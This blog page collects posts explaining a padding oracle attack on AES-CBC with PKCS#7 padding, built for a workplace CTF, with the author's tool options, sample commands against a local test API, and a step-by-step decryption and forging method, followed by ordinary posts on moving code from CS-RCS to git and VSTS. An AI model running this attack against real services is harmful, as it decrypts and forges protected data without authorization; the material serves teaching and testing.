Padding Oracle 3–making it usable

Just a quick note, because I’ve been sick this week, but last weekend, I put a little more work into my Padding Oracle exploit tool.

You can find the new code up at https://github.com/alunmj/PaddingOracle, and because of all the refactoring, it’s going to look like a completely new batch of code. But I promise that most of it is just moving code from Program.cs into classes, and adding parsing of command-line arguments.

I don’t pretend to be the world’s greatest programmer by any stretch, so if you can tell me a better way to do what I’ve done here, do let me know, and I’ll make changes and post something about them here.

Also, please let me know if you use the tool, and how well it worked (or didn’t!) for you.

Arguments

The arguments currently supported are:

URL

The only parameter unadorned with an option letter – this is the URL for the resource the Padding Oracle code will be pounding to test guesses at the encrypted code.

-c ciphertext

Also, –cipher. This provides a .NET regular expression which matches the ciphertext in the URL.

-t encoding:b64|b64URL|hex|HEX

Also, –textencoding, –encoding. This sets the encoding that’s used to specify the ciphertext (and IV) in the URL. The default is b64

  • b64 – standard base64, URL encoded (so ‘=’ is ‘%3d’, ‘+’ is ‘%2b’, and ‘/’ is ‘%2f’)
  • b64URL – “URL safe” base64, which uses ‘!’, ‘-‘ and ‘~’ instead of the base64 characters that would be URL encoded.
  • hex – hexadecimal encoding with lower case alphabetic characters a-f.
  • HEX – hexadecimal encoding with upper case alphabetic characters A-F.

-i iv

Also, –iv. This provides a .NET regular expression which matches the IV in the URL if it’s not part of the ciphertext.

-b blocksize

Also, –blocksize. This sets the block size in bytes for the encryption algorithm. It defaults to 16, but should work for values up to 32.

-v

Also, –verbose. Verbose – output information about the packets we’re decrypting, and statistics on speed at the end.

-h

Also, –help. Outputs a brief help message

-p parallelism:-1|1|#

Also –parallelism. Dictates how much to parallelise. Specifying ‘1’ means to use one thread, which can be useful to see what’s going on. –1 means “maximum parallelisation” – as many threads as possible. Any other integer is roughly akin to saying “no more than this number of threads”, but may be overridden by other aspects of the Windows OS. The default is –1.

-e encryptiontext

Instead of decrypting, this will encrypt the provided text, and provide a URL in return that will be decrypted by the endpoint to match your provided text.

Examples

These examples are run against the WebAPI project that’s included in the PadOracle solution.

Example 1

Let’s say you’ve got an example URL like this:

http://localhost:31140/api/encrypted/submit?iv=WnfvRLbKsbYufMWXnOXy2Q%3d%3d&ciphertext=087gbLKbFeRcyPUR2tCTajMQAeVp0r50g07%2bLKh7zSyt%2fs3mHO96JYTlgCWsEjutmrexAV5HFyontkMcbNLciPr51LYPY%2f%2bfhB9TghbR9kZQ2nQBmnStr%2bhI32tPpaT6Jl9IHjOtVwI18riyRuWMLDn6sBPWMAoxQi6vKcnrFNLkuIPLe0RU63vd6Up9XlozU529v5Z8Kqdz2NPBvfYfCQ%3d%3d

This strongly suggests (because who would use “iv” and “ciphertext” to mean anything other than the initialisation vector and cipher text?) that you have an IV and a ciphertext, separate from one another. We have the IV, so let’s use it – here’s the command line I’d try:

PadOracle "http://localhost:31140/api/encrypted/submit?iv=WnfvRLbKsbYufMWXnOXy2Q%3d%3d&ciphertext=087gbLKbFeRcyPUR2tCTajMQAeVp0r50g07%2bLKh7zSyt%2fs3mHO96JYTlgCWsEjutmrexAV5HFyontkMcbNLciPr51LYPY%2f%2bfhB9TghbR9kZQ2nQBmnStr%2bhI32tPpaT6Jl9IHjOtVwI18riyRuWMLDn6sBPWMAoxQi6vKcnrFNLkuIPLe0RU63vd6Up9XlozU529v5Z8Kqdz2NPBvfYfCQ%3d%3d" -c "087gb.*%3d%3d" –i "WnfvRL.*2Q%3d%3d"

This is the result of running that command:

capture20181111175736366

Notes:

  • The IV and the Ciphertext both end in Q==, which means we have to specify the regular expressions carefully to avoid the expression being greedy enough to catch the whole query string.
  • I didn’t use the “-v” output to watch it run and to get statistics.
  • That “12345678” at the end of the decrypted string is actually there – it’s me trying to push the functionality – in this case, to have an entirely padding last block. [I should have used the letter “e” over and over – it’d be faster.]

Example 2

Same URL, but this time I want to encrypt some text.

Our command line this time is:

PadOracle "http://localhost:31140/api/encrypted/submit?iv=WnfvRLbKsbYufMWXnOXy2Q%3d%3d&ciphertext=087gbLKbFeRcyPUR2tCTajMQAeVp0r50g07%2bLKh7zSyt%2fs3mHO96JYTlgCWsEjutmrexAV5HFyontkMcbNLciPr51LYPY%2f%2bfhB9TghbR9kZQ2nQBmnStr%2bhI32tPpaT6Jl9IHjOtVwI18riyRuWMLDn6sBPWMAoxQi6vKcnrFNLkuIPLe0RU63vd6Up9XlozU529v5Z8Kqdz2NPBvfYfCQ%3d%3d" -c "087gb.*%3d%3d" –i "WnfvRL.*2Q%3d%3d" –e "Here’s some text I want to encrypt"

When we run this, it warns us it’s going to take a very long time, and boy it’s not kidding – we don’t get any benefit from the frequency table, and we can’t parallelise the work.

capture20181111215602359

And you can see it took about two hours.

Padding Oracle 2: Speeding things up

Last time, I wrote about how I’d decided to write a padding oracle exploit tool from scratch, as part of a CTF, and so that I could learn a thing or two. I promised I’d tell you how I made it faster… but first, a question.

Why build, when you can borrow?

One question I’ve had from colleagues is “why didn’t you just run PadBuster?”

It’s a great question, and in general, you should always think first about whether there’s an existing tool that will get the job done quickly and easily.

Time

Having said that, it took me longer to install PadBuster and the various language components it required than it did to open Visual Studio and write the couple of hundred lines of C# that I used to solve this challenge.

So, from a time perspective, at least, I saved time by doing it myself – and this came as something of a surprise to me.

The time it used up was my normally non-productive time, while I’m riding the bus into Seattle with spotty-to-zero network connectivity (there’s none on the bus, and my T-Mobile hot-spot is useful, but neither fast nor reliable down the I-5 corridor). This is time I generally use to tweet, or to listen to the BBC.

Interest

I just plain found it interesting to take what I thought I knew about padding oracles, and demonstrate that I had it solidly in my head.

That’s a benefit that really can’t be effectively priced.

Plus, I learned a few things doing it myself:

  • Parallelisation in C# is easier than it used to be.
  • There’s not much getting around string conversions in trying to speed up the construction of a base64-encoded URL, but then again, when executing against a crypto back-end, that’s not your bottleneck.
  • Comments and blank lines are still important, especially if you’re going to explain the code to someone else.

Performance

The other thing that comes with writing your own code is that it’s easier to adjust it for performance – you know where the bottlenecks might lie, and you can dive in and change them without as much of a worry that you’re going to kill the function of the code. Because you know at a slightly more intuitive level how it all works.

You can obviously achieve that intuitive level over time with other people’s code, but I wasn’t really going to enjoy that.

Looking at some of the chat comments directed at the PadBuster author, it’s clear that other people have tried to suggest optimisations to him, but he believes them not to be possible.

Guessing

Specifically, he doesn’t see that it’s possible to use guesses as to the plaintext’s likely contents to figure out what values should be in the ciphertext. You just plug the values 0..255 into the N-1 ciphertext block until your padding error from the N block goes away, and then that value can be XORed with the padding value to get the intermediate value from the N block. Then the intermediate value gets XORed with the original ciphertext value from the N-1 block to give the original plaintext.

Let’s see how that works in the case of the last block – where we’re expecting to see some padding anyway. Let’s say our block size is 4. Here’s what two of our ciphertext blocks might look like:

CN-1 CN
0xbe 0x48 0x45 0x30 0x71 0x4f 0xcc 0x63

Pretty random, right? Yeah, those are actually random numbers, but they’ll work to illustrate how we work here.

We iterate through values of CN-1[3] from 0..255, until we get a response that indicates no padding errors.

0x30 comes back without any padding errors. That’s convenient. So, we’ve sent “be484530714fcc63”, and we know now that we’ve got a padding byte correct. Buuut that isn’t the only right padding byte, because this is the last block, which also has a valid padding byte.

In fact, we can see that 0x30 matches the original value of the CN-1 block’s last byte, so that’s not terribly useful. Our padding count has a good chance of not being 1, and we’re trying to find the value that will set it to 1.

Keep iterating, and we get 0x32, giving us a request that doesn’t contain a padding exception. Two values. Which one made our padding byte 0x1, so we can use it to determine the intermediate value?

The only way we get two matches will be because the real plaintext ends in a padding count that isn’t 0x1. One of those values corresponds to 0x1, the other corresponds to the padding count, which could be 0x2..0x4. [Because we’re using four byte blocks as an example – a real-life example might have a 16-byte block size, so the padding count could be up to 0x10]

The clue is in the original plaintext – 0x30 MUST be the value that corresponds to the original padding count, so 0x32 MUST correspond to 0x1.

[If the original padding count was 0x1, we would only find one value that matched, and that would be the original value in CN-1]

That means the Intermediate value is 0x32 XOR 0x1 = 0x33 – which means the plaintext value is 0x3 – there’s three bytes of padding at the end of this block.

We can actually write down the values of the last three plaintext and intermediate blocks now:

CN-1 CN
0xbe 0x48 0x45 0x30 0x71 0x4f 0xcc 0x63
IN
?? 0x4b 0x46 0x33
C’N-1 PN
?? 0x4f 0x42 0x37 ?? 0x3 0x3 0x3

Wow – that’s easy! How’d we do that? Really simple. We know the last padding must be three bytes of 0x3, so we write those down. Then the intermediate bytes must be the XOR of 0x3 with the value in the CN-1 block.

[I chose in the code, instead of just “writing down” the values for each of those bytes, to check each one as I did so, to make sure that things were working. This adds one round-trip for each byte of padding, which is a relatively low cost, compared to the rest of the process.]

Now, if we want to detect the next byte, we want to change the last three bytes of CN-1, so they’ll set the PN values to 0x4, and then iterate through the target byte until we get a lack of padding errors.

So, each new value of the last few bytes of CN-1 will be C’[i] = C[i] XOR 0x3 XOR 0x4 – taking the value in the original, XORing it with the original plaintext, and then with the desired plaintext to get a new value for the ciphertext.

I’ve put those values of C’N-1 in the table above.

This trick doesn’t just stop with the padding bytes, though. I’m going to guess this is a JSON object, so it’s going to end with a ‘}’ character (close-brace), which is 0x7d.

So, C’ = C XOR 0x7d XOR 0x4 = 0xbe XOR 0x7d XOR 0x4 = 0xc7.

Let’s try that – we now send “c74f4237” – no padding error!

A successful guess for the last four bytes of PN. Now we can fill in more of the table:

CN-1 CN
0xbe 0x48 0x45 0x30 0x71 0x4f 0xcc 0x63
IN
0xba 0x4b 0x46 0x33
C’N-1 PN
0xc7 0x4f 0x42 0x37 0x7d 0x3 0x3 0x3

Awesome.

That does require me making the right guess, surely, though?

Yes, but it’s amazing how easy it is to either make completely correct guesses, or just pick a set of values that are more likely to be good guesses, and start by trying those, failing back to the “plod through the rest of the bytes” approach when you need to.

I’ve coded an English-language frequency table into my padding oracle code, because that was appropriate for the challenge I was working on.

This code is available for you to review and use at https://github.com/alunmj/PaddingOracle/blob/master/PadOracle/Program.cs

You can imagine all kinds of ways to improve your guesses – when proceeding backward through a JSON object, for instance, a ‘}’ character will be at the end; it’ll be preceded by white space, double quotes, or brackets/braces, or maybe numerics. A 0x0a character will be preceded by a 0x0d (mostly), etc.

Parallelisation

The other big performance improvement I made was to parallelise the search. You can work on one block entirely independently from another.

I chose to let the Parallel.For() function from C# decide exactly how it was going to split up work between different blocks, and the result is a whole lot faster. There are some wrinkles to manage when parallelising an algorithm, but I’m not going to get into that here. This is not a programming blog, really!

15x performance improvement

I figured I’d put that in big letters, because it’s worth calling out – the parallelisation alone obviously multiplies your performance by the number of cores you’ve got (or the number of cores the web server has, if it’s underpowered), and the predictive work on the text does the rest. Obviously, the predictive approach only works if you can separate between “likely” and “unlikely” characters – if the plaintext consists of random binary data, you’re not going to get much of a benefit. But most data is formatted, and/or is related to English/Latin text.

Bonus stage – use a decryptor to encrypt!

I haven’t published the code for this part yet, but you can use this same breach to encrypt data without knowing the key.

This is really fun and simple once you get all the previous stuff. Here goes.

Let’s encrypt a block.

Encrypting a block requires the generation of two ciphertext blocks from one plaintext block. What the second block is, actually doesn’t matter. We can literally set it to random data, or (which is important) specific data of our choosing.

The first block of the pair, acting like an IV, we can set to 0. There’s a reason for this which we’ll come to in a minute.

With these two initial blocks, we run the decrypter. This will give us a ‘plaintext’ block as output. Remember how the intermediate block is the plaintext block XORed with the first of the pair of blocks? Well, because we set that first block to all zeroes, that means the plaintext block IS the same as the intermediate block. And that intermediate block was generated by decrypting the second block of the pair. In order for that decryption to result in the plaintext we want instead, we can simply take the intermediate block, XOR it with the plaintext block we want, and then put that into the first ciphertext block. [We’re actually XORing this with the first ciphertext block, but that’s a straight copy in this case, because the first ciphertext block is zeroes.]

Now, draw the rest of the owl

Do the same thing for each of the rest of the blocks.

Sadly, there’s no parallelising this approach, and the guessing doesn’t help you either. You have to start with CN (randomly generated) and CN-1 (deduced with the approach above), then when you’ve established what CN-1 is, you can use the same approach to get CN-2, and so on back to the IV (C0). So this process is just plain slow. But it allows you to encrypt an arbitrary set of data.

Padding Oracles for a thousand, please

We did a CTF at work.

I have to say it was loads of fun – I’ve never really participated in a CTF before, so it was really good to test my hacking skills against my new colleagues.

We had one instruction from my manager – “don’t let the interns beat you”. I was determined to make sure that didn’t happen, but I was also determined to share as much knowledge and excitement for InfoSec as possible. This meant that once or twice, I may have egged an intern on in the face of the fact that they were about to discover it anyway, and it just seemed like a really good way to keep them interested.

This is not that story.

This is about me turning the corner from knowing about a security failure, to understanding how it works. Let’s see if I can help you guys understand, too.

Tales from the Crypto

That’s the title of my blog, and there’s not a whole lot of cryptography here. It’s just a play on words, which was a little more relevant when I first started the blog back in 2005. So here’s some crypto, at last.

There’s several aspects to cryptography that you have to get right as a developer:

  • Identify whether you’re doing hashing, signing, encryption, encoding, etc.
  • If you have a key, create and store it securely
  • Pick correct algorithms – modern algorithms with few known issues
  • Use the algorithms in a way that doesn’t weaken them

Having tried to teach all of these to developers in various forms, I can tell you that the first one, which should be the simplest, is still surprisingly hard for some developers to master. Harder still for managers – the number of breach notifications that talk about passwords being “encrypted” is a clear sign of this – encrypted passwords mean either your developers don’t understand and implemented the wrong thing, or your manager doesn’t understand what the developer implemented and thinks “encrypted sounds better than hashed”, and puts that down without checking that it’s still technically accurate.

Key creation (so it’s not predictable), and storage (so it can’t be found by an attacker) is one of those issues that seems to go perennially unsolved – I’m not happy with many of the solutions I’ve seen, especially for self-hosted services where you can’t just appeal to a central key vault such as is currently available in all good cloud platforms.

Picking correct algorithms is a moving target. Algorithms that were considered perfectly sound ten or twenty years ago are now much weaker, and can result in applications being much weaker if they aren’t updated to match new understanding of cryptography, and processor and memory speed and quantity improvements. You can store rainbow tables in memory now that were unthinkable on disk just a decade or two ago.

Finally, of course, if all that wasn’t enough to make cryptography sound really difficult (spoiler: it is, which is why you get someone else to do it for you), there are a number of ways in which you can mess up the way in which you use the algorithm.

Modes, block-sizes, and padding

There are a large number of parameters to set even when you’ve picked which algorithms you’re using. Key sizes, block sizes, are fairly obvious – larger is (generally) better for a particular algorithm. [There are exceptions, but it’s a good rule of thumb to start from.]

There are a number of different modes available, generally abbreviated to puzzling TLAs – ECB, CFB, OFB, CBC, GCM, CTR, and so on and so forth. It’s bewildering. Each of these modes just defines a different order in which to apply various operations to do things like propagating entropy, so that it’s not possible to infer anything about the original plaintext from the ciphertext. That’s the idea, at least. ECB, for instance, fails on this because any two blocks of plaintext that are the same will result in two blocks of ciphertext that are the same.

And if you’re encrypting using a block cipher, you have to think about what to do with the last block – which may not be a complete block. This requires that the block be filled out with “padding” to make a full block. Even if you’re just filling it out with zeroes, you’re still padding – and those zeroes are the padding. (And you have to then answer the question “what if the last block ended with a zero before you padded it?”)

There’s a number of different padding schemes to choose from, too, such as “bit padding”, where after the last bit, you set the next bit to 1, and the remaining bits in the block to 0. Or there’s padding where the last byte is set to the count of how many padding bytes there are, and the remaining bytes are set to 0 – or a set of random bytes – or the count repeated over and over. It’s this latter that is embodied as PKCS#5 or PKCS#7 padding. For the purposes of this discussion, PKCS#7 padding is a generalised version of PKCS#5 padding. PKCS#5 padding works on eight-byte blocks, and PKCS#7 padding works on any size blocks (up to 256 bytes, presumably).

So, if you have a three-byte last block, and the block size is 16 bytes, the last block is ** ** ** 0x0d 0x0d 0x0d 0x0d 0x0d 0x0d 0x0d 0x0d 0x0d 0x0d 0x0d 0x0d 0x0d (where “**” represents the last three bytes of data, and 0x0d represents the hexadecimal value for 13, the number of bytes in the padding). If your last block is full, PKCS#7 covers this by making you create an extra 16-byte block, with the value 0x10 (decimal 16) in every byte.

Tying this in to the CTF

It’s not at all unlikely that you wind up with the scenario with which we were presented in the CTF – a service that communicated with AES encryption, in CBC mode, using PKCS#7 padding. The fact that this was described as such was what tipped me off in the first place. This is the perfect setup for a Padding Oracle attack.

An Oracle is simply a device/function/machine/system/person that you send a request to, and get a response back, and which gives you some information as a result. The classical Oracles of Ancient Greece & Roman times were confusing and unhelpful at best, and that’s really something we want from any cryptographic oracle. The term “Random Oracle” refers to a hypothetical system which returns random information to every query. A good cryptographic system is one that is indistinguishable from a Random Oracle.

Sadly, CBC with PKCS#7 padding is generally very different from a Random Oracle. It is a Padding Oracle, because it will tell us when the padding is correct or incorrect. And that’s our vulnerability.

At this point, I could have done what one of my colleagues did, and download PadBuster, choosing parameters and/or modifying code, to crack the encryption.

But… I’ve been attacking this CTF somewhat … non-traditionally, using tools other than the normal ones, and so I thought I’d try and understand the algorithm’s weaknesses, and implement my own attack. I wrote it on the bus on my way into work, and was pleased to see when I got in that it worked – albeit slowly – first time.

How CBC and PKCS#5/7 is vulnerable

When decrypting each block using CBC, we say that PN = DK(CN)⊕CN-1 – which is just a symbolic way of saying that the recipient Decrypts (with key “K”) the current Ciphertext block (block N), and then XORs the result with the previous Ciphertext block (the N-1th block). Let’s also assume that we’re only decrypting those two blocks, N-1 and N, with N being the last block provided to the recipient.

In other modes, the padding check may not deliver the helpful information we’re looking for, but CBC is special. The way CBC decrypts data is to decrypt the current block of ciphertext (CN), which creates an intermediate block DK(CN). That intermediate block is combined with the previous ciphertext block, CN-1, to give the plaintext block, PN. This combining of blocks is done using the XOR (exclusive-or) operation, which has interesting properties any developer should be familiar with. Particularly, it’s important to note that XOR (represented here as “⊕”) is reversible. If X⊕Y=Z, you know also that Z⊕Y=X and Z⊕X=Y. This is one of the reasons the XOR operation is used in a lot of cryptographic algorithms.

If we want to change things in the inputs to produce a different output, we can really only change two things – the current and the previous block of Ciphertext – CN and CN-1. We should really only alter one input at a time. If we alter CN, that’s going to be decrypted, and a small change will be magnified into a big difference to the DK(CN) value – all the bytes will have changed. But if we alter CN-1, just a bit, what we wind up with is a change in the plaintext value PN which matches that change. If we alter the 23rd bit of CN-1, it will alter the 23rd bit of PN, and only that one bit. Now if we can find what we’ve changed that bit to, we can then figure out what that means we must have changed it from.

If we change the last byte of CN-1, to create C’N-1 (pronounced “C prime of N minus 1”) and cycle it through all the possible values it can take, the decryption will occur, and the recipient will reject our new plain text, P’N (“P prime of N”) because it is poorly formed – it will have a bad padding. With one (two, but I’ll come to that in a minute) notable exception. If the last byte of the plaintext decrypted is the value 0x01, it’s a single byte of padding – and it’s correct padding. For that value of the last byte of C’N-1, we know that the last byte of P’N is 1. We can rewrite PN = DK(CN)⊕CN-1 as DK(CN) = CN-1⊕PN – and then we can put the values in for the last byte: DK(CN)[15] = C’N-1[15]⊕0x01.

Let’s say, for illustration’s sake, that the value we put in that last byte of C’N-1 was 0xa5, when our padding was accepted. That means DK(CN)[15] = 0xa5 ⊕ 0x01 = 0xa4. Note the lack of any “prime” marks there – we’ve figured out what the original value of the decrypted last byte was. Note that this isn’t the same as the last byte of the plain text. No, we get that by taking this new value and XORing it with the original last byte of the previous block of ciphertext – that’s CN-1[15]. For illustration, let’s say that value is 0xc5. We calculate PN[15] = DK(CN)[15]⊕CN-1[15] = 0xa4⊕0xc5 = 0x61. That’s the lower case letter ‘a’.

OK, so we got the first piece of plaintext out – the last byte.

[Remember that I said I’d touch on another case? If CN is the original last block of ciphertext, it already contains valid padding! But not necessarily the 0x01 we’re trying to force into place.]

Let’s get the next byte!

Almost the same process is used to get the next byte, with a couple of wrinkles. First, obviously, we’re altering the second-to-last byte through all possible values. Second, and not quite so obvious, we have to tweak the last byte once as well, because we’re looking to get the sequence 0x02 0x02 (two twos) to happen at the end of P’N. The last byte of C’N-1 to achieve this is simply the last byte of C’N-1 that we used to get 0x01, XORed by 0x03 (because that’s 0x02 ⊕ 0x01). In our illustrative example, that’s 0xa6.

And the next, and the next…

Each time, you have to set the end values of the ciphertext block, so that the end of P’N will look like 0x03 0x03 0x03, 0x04 0x04 0x04 0x04, etc, all the way up to 0x10 … 0x10 (sixteen 16s).

Code, or it didn’t happen

So here’s the 200 lines or so that I wrote on the bus. I also wrote a test harness so that this would work even after the CTF finished and got shut down. You’ll find that in the same repo.

I’ve massaged the code so it’s easier to understand, or to use as an explainer for what’s going on.

I plan on expanding this in a couple of ways – first, to make it essentially command-line compatible with ‘PadBuster’, and second, to produce a graphical demo of how the cracking happens.

And in the next post, I’m going to talk a little about how I optimised this code, so that it was nearly 15x faster than PadBuster.

Final parts of the Git move – VSTS

I’ve posted before how I’d like to get my source code out of the version control system I used to use, because it was no longer supported by the manufacturer, and into something else.

I chose git, in large part because it uses an open format, and as such isn’t going to suffer the same problem I had with ComponentSoftware’s CS-RCS.

Now that I’ve figured out how to use Bash on Ubuntu on Windows to convert from CS-RCS to git, using the rcs-fast-export.rb script, I’m also looking to protect my source control investment by storing it somewhere off-site.

This has a couple of good benefits – one is that I’ll have access to it when I’m away from my home machine, another is that I’ll be able to handle catastrophic outages, and a third is that I’ll be able to share more easily with co-conspirators.

I’m going to use Visual Studio Team Services (VSTS), formerly known as Visual Studio Online, previous to that, as Team Foundation Services Online. You can install VSTS on your own server, or you can use the online tool at <yourdomain>.visualstudio.com. If your team is smaller than five people, you can do this for free, just like you can use Visual Studio 2015 Community Edition for free. This is a great way in which Microsoft supports hobbyist developers, open source projects, college students, etc.

Where do we start?

After my last post on the topic, you have used git and rcs-fast-export.rb to create a Git repository.

You may even have done a “git checkout” command to get the source code into a place where you can work on it. That’s not necessary for our synchronisation to VSTS, because we’re going to sync the entire repository. This will work whether you are using the Bash shell or the regular Command Prompt, as long as you have git installed and in your PATH.

If you’ve actually made any changes, be sure to add and commit them to the local Git repository. We don’t want to lose those!

I’m also going to assume you have a VSTS account. First, visit the home page.

capture20161124140615575

Under “Recent Projects & Teams”, click “New”.

Give it a name and a description – I suggest leaving the other settings at their default of “Agile” and “Git” unless you have reason to change. The setting of “Git” in particular is required if you’re following along, because that’s how we’re going to synchronise next.

capture20161124141013440

When you click “Create project”, it’ll think for a while…

capture20161124141200387

And then you’ll have the ability to continue on. Not sure my team’s actually “going to love this”, considering it’s just me!

capture20161124141238396

Yes, it’s not just your eyes, the whole dialog moved down the screen, so you can’t hover over the button waiting to hit it.

Click “Navigate to project”, and you’ll discover that there’s a lot waiting for you. Fortunately a quick popup gives you the two most likely choices you’ll have for any new project.

capture20161124141442790

As my team-mates will attest, I don’t do Kanban very well, so we’ll ignore that side of things, I’m mostly using this just to track my source code. So, hit “Add Code”, and you get this:

capture20161124141657094

Some interesting options here

Don’t choose any yet Smile

Clone to your computer” – an odd choice of the direction to use, since this is an empty source directory. But, since it has a “Clone in Visual Studio” button, this may be an easy way to go if you already have a Visual Studio project working with Git that you want to tie into this. There is a problem with this, however, in that if you’re working with multiple versions of Visual Studio, note that any attempt from VSTS to open Visual Studio will only open the most recently installed version of Visual Studio. I found no way to make Visual Studio 2013 automatically open from the web for Visual Studio 2013 projects, although the Visual Studio Version Selector will make the right choice if you double click the SLN file.

Push an existing repository from command line” – this is what I used. A simple press of the “Copy to clipboard” button gives me the right commands to feed to my command shell. You should run these commands from somewhere in your workspace, I would suggest from the root of the workspace, so you can check to see that you have a .git folder to import before you run the commands.

BUT – I would strongly recommend not dismissing this screen while you run these commands, you can’t come back to it later, and you’ll want to add a .gitignore file.

The other options are:

Import a repository” – this is if you’re already hosting your git repository on some other web site (like Github, etc), and want to make a copy here. This isn’t a place for uploading a fast-import file, sadly, or we could shortcut the git process locally. (Hey, Microsoft, you missed a trick!)

Initialize with a README or gitignore” – a useful couple of things to do. A README.md file is associated with git projects, and instructs newcomers to the project about it – how to build it, what it’s for, where to find documentation, etc, etc – and you can add this at any time. The .gitignore file tells git what file names and extensions to not bother with putting into. Object files, executables, temporary files, machine generated code, PCH & PDB files, etc, etc. You can see the list is long, and there’s no way to add a .gitignore file with a single button click after you’ve left this page. You can steal one from an empty project, by simply copying it – but the button press is easier.

What I’ve found

I’ve found it useful to run the “git remote” and “git push” commands from the command-line (and I choose to run them from the Bash window, because I’m already there after running the RCS export), and then add the .gitignore. So, I copy the commands and send them to the shell window, before I press the “Add a .gitignore” button, choose “Visual Studio” as my gitignore type, and then select “Initialize”:

First, let’s start with a recap of using the rcs-fast-export command to bring the code over from the old RCS to a new Git repository:

capture20161124145136450

Commands in that window:

  • cd workspace/
  • mkdir Juggler
  • cd Juggler
  • ../rcs-fast-export.rb -A ../AuthorsFile /mnt/c/RCS/c/stress/Juggler > Juggler.gx
  • git init
  • git fast-import < Juggler.gx

capture20161124145146126

Commands:

  • git reset

capture20161124145151824

No commands – we’ve imported and are ready to sync up to the VSTS server.

capture20161124145332778

Commands (copied from the “Add Code” window):

capture20161124145452345

But that’s not quite all…

Your solution still has lines in it dictating what version control you’re using. So you want to unbind that.

[If you don’t unbind existing version control, you won’t be able to use the built-in version control features in Visual Studio, and you’ll keep getting warnings from your old version control software. When you uninstall your old version control software, Visual Studio will refuse to load your projects. So, unbinding your old version control is really important!]

I like to do that in a different directory from the original, for two reasons:

  1. I don’t want to overwrite or delete the working workspace I’ve been working in until the new workspace works. So I still have the old directory to work from if I need to, while I’m moving to the new place.
  2. I want to make sure that a developer (even if it’s just me six months from now, after I’ve wiped everything in a freak electromagnet accident) can connect to this version control source, and build everything.

So, now it’s Command Prompt window time…

capture20161124150214538

Yes, you could do that from Visual Studio, but it’s just as easy from the command line. Note that I didn’t actually enter credentials here – they’re cached by Windows.

Commands entered in that window:

  • md workspace/Juggler
  • cd workspace/Juggler
  • git clone https://<yourdomain>.visualstudio.com/DefaultCollection/_git/Juggler .
  • Juggler2.sln

Your version control system may complain when opening this project that it’s not in the place it remembers being in… I know mine does. Tell it that’s OK.

capture20161124151354750

[Yes, I’ve changed projects, from Juggler to EFSExt. I suddenly realised that Juggler is for Visual Studio 2010, which is old, and not installed on this system.]

Now that we’ve opened the solution in Visual Studio, it’s time to unbind the old source control. This is done by visiting the File => Source Control => Change Source Control menu option:

capture20161124151700000

You’ll get a dialog that lists every project in this solution. You need to select every project that has a check-mark in the “Connected” column, and click the “Unbind” button.

Luckily, in this case, they’re already selected for me, and I just have to click “Unbind”:

capture20161124151846349

You are warned:

capture20161124152055066

Note that this unbinding happens in the local copy of the SLN and VCPROJ, etc files – it’s not actually going to make any changes to your version control. [But you made a backup anyway, because you’re cautious, right?]

Click “Unbind” and the dialog changes:

capture20161124152229664

Click OK, and we’re nearly there…

Finally, we have to sync this up to the Git server. And to do that, we have to change the Source Control option (which was set when we first loaded the project) to Git.

This is under Tools => Options => Source Control. Select the “Microsoft Git Provider” (or in Visual Studio 2015, simply “Git”):

capture20161124152800000

Press “OK”. You’ll be warned if your solution is still bound in some part to a previous version control system. This can happen in particular if you have a project which didn’t load, but which is part of this solution. I’m not addressing here what you have to do for that, because it involves editing your project files by hand, or removing projects from the solution. You should decide for yourself which of those steps carries the least risk of losing something important. Remember that you still have your files and their history in at least THREE version control systems at this point – your old version control, the VSTS system, and the local Git repository. So even if you screw this up, there’s little real risk.

Now that you have Git selected as your solution provider, you’ll see that the “Changes” option is now available in the Team Explorer window:

capture20161124153434632

Save all the files (but I don’t have any open!) by pressing Ctrl-Shift-S, or selecting File => Save All.

If you skip this step, there will be no changes to commit, and you will be confused.

Select “Changes”, and you’ll see that the SLN files and VCPROJ files have been changed. You can preview these changes, but they basically are to do with removing the old version control from the projects and solution.

capture20161124153724095

It wants a commit message. This should be short and explanatory. I like “Removed references to old version control from solution”. Once you’ve entered a commit message, the Commit button is available. Click it.

It now prompts you to Sync to the server.

capture20161124153910915

So click the highlighted word, “Sync”, to see all the unsynced commits – you should only have one at this point, but as you can imagine, if you make several commits before syncing, these can pile up.

capture20161124154006176

Press the “Sync” button to send the commit up to the server. This is also how you should usually get changes others have made to the code on the server. Note that “others” could simply mean “you, from a different computer or repository”.

Check on the server that the history on the branch now mentions this commit, so that you know your syncing works well.

And you’re done

Sure, it seems like a long-winded process, but most of what I’ve included here is pictures of me doing stuff, and the stuff I’m doing is only done once, when you create the repository and populate it from another. Once it’s in VSTS, I recommend building your solution, to make sure it still builds. Run whatever tests you have to make sure that you didn’t break the build. Make sure that you still have valid history on all your files, especially binary files. If you don’t have valid history on any files in particular, check the original version control, to see if you ever did have. I found that my old CS-RCS implementation was storing .bmp files as text, so the current version was always fine, but the history was corrupted. That’s history I can’t retrieve, even with the new source control.

Now, what about those temporary repositories? Git makes things really easy – the Git repository is in a directory off the root of the workspace, called “.git”. It’s hidden, but if you want to delete the repository, just delete the “.git” folder and its contents. You can delete any temporary workspaces the same way, of course.

I did spend a little time automating the conversion of multiple repositories to Git, but that was rather ad-hoc and wobbly, so I’m not posting it here. I’d love to think that some of the rest of this could be automated, but I have only a few projects, so it was good to do by hand.

Final Statement

No programmer should be running an unsupported, unpatched, unupdated old version control system. That’s risky, not just from a security perspective, but from the perspective that it may screw up your files, as you vary the sort of projects you build.

No programmer should be required to drop their history when moving to a new version control system. There is always a way to move your history. Maybe that way is to hire a grunt developer to fetch versions dated at random/significant dates throughout history out of the old version control system, and check them in to the new version control system. Maybe you can write automation around that. Or maybe you’ll be lucky and find that someone else has already done the automation work for you.

Hopefully I’ve inspired you to take the plunge of moving to a new version control system, and you’ve successfully managed to bring all your precious code history with you. By using Visual Studio Team Services, you’ve also got a place to track features and bugs, and collaborate with other members of a development team, if that’s what you choose to do. Because you’ve chosen Git, you can separate the code and history at any time from the issue tracking systems, should you choose to do so.

Let me know how (if?) it worked for you!

Got on with Git

In which I move my version control from ComponentSoftware’s CS-RCS Pro to Git while preserving commit history.

[If you don’t want the back story, click here for the instructions!]

OK, so having watched the video I linked to earlier, I thought I’d move some of my old projects to Git.

I picked one at random, and went looking for tools.

I’m hampered a little by the fact that all my old projects used ComponentSoftware’s “CS-RCS Pro”.

Why did you choose CS-RCS Pro?

A couple of really good reasons:

  • It works on Windows
  • It integrates moderately well with Visual Studio through the VSS functionality
  • It’s compatible with GNU RCS, which I had some familiarity with
  • It was free if you’re the only dev on your projects

But you know who doesn’t use CS-RCS Pro any more?

That’s right, ComponentSoftware.

It’s a dead platform, unsupported, unpatched, and belongs off my systems.

So why’s it still there?

One simple reason – if I move off the platform, I face the usual choice when migrating from one version control system to another:

